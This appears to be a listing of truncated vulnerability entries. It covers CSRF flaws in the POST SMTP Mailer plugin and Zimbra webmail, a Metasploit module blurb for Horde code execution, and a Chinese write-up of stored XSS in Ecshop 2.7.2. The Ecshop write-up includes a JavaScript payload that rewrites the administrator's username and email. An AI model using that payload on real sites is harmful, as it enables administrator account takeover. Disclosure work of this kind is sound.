CVE-2023-3178 POST SMTP Mailer < 2.5.7 - Arbitrary Log Deletion via CSRF

The POST SMTP Mailer WordPress plugin before 2.5.7 does not have proper CSRF checks in some AJAX actions, which could allow attackers to make logged in users with the managepostmansmtp capability delete arbitrary logs via a CSRF attack...

CVE-2022-37043

An issue was discovered in the webmail component in Zimbra Collaboration Suite ZCS 8.8.15 and 9.0. When using preauth, CSRF tokens are not checked on some POST endpoints. Thus, when an authenticated user views an attacker-controlled page, a request will be sent to the application that appears to ...

Horde 5.2.22 CSV Import Code Execution Exploit

The HordeData module version 2.1.4 and before present in Horde Groupware version 5.2.22 allows authenticated users to inject arbitrary PHP code thus achieving remote code execution the server hosting the web application. This module requires Metasploit: https://metasploit.com/download Current...

Ecshop2.7.2持久型XSS（可获得管理员帐号）

简要描述： 个人资料修改时，Javascript代码过滤不够严格，XSS代码直接进入数据库 详细说明： 密码保护问题这一项，没有使用正则过滤，其他的的都有正则过滤。我们可以在密码保护问题里输入XSS，但是后台查看会员资料是不显示密码保护问题的，所以这里必须要网站后台添加了新的 “会员注册项”时，后台查看资料就会显示了，此处填入一段引入外部js的代码:" 外部test.js文件内容如下 Ajax.call'privilege.php?act=update','id=1&username=heihei&[email protected]','',"POST","JSON"; 漏洞证明：...